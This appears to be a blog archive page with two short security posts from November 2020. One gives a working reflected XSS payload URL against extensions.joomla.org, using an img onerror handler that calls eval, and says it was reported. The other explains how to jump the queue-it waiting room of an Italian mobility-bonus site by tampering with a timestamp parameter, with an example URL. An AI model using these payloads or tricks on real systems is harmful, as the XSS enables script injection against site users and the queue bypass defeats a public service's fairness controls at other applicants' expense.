Showing posts from November, 2020

https://extensions.joomla.org | xss

XSS:
https://extensions.joomla.org/instant-search/?jed_live[query]=recaptcha&jed_live[refinementList][versions][0]=fantastic <img src=x:alert(alt) onerror=eval(src) alt="Merry xssmas!">

Archived page: https://archive.is/wip/kCTik

Note: Bug reported to joomla.org on 30/11/2020

buonomobilita.it - jump the queue (salta la fila)

Open Tamper Data (Firefox) or any other application (such as a proxy that can tamper with data) and check the POST requests. When you get something like this:

https://sogei.queue-it.net/?c=sogei&e=mobutente2020&q=52fddcda-579f-46b2-bb44-6c4ddf68e730&cv=[unixtimestamp]&cid=it-IT

set the unixtimestamp to a future date, e.g. if the current value is 1604445083694, replace it with 1774445083694 (2026+). I used just 1774495521 and it works.

Example: https://sogei.queue-it.net/?c=sogei&e=mobutente2020&q=52fddcda-579f-46b2-bb44-6c4ddf68e730&cv=1774495521&cid=it-IT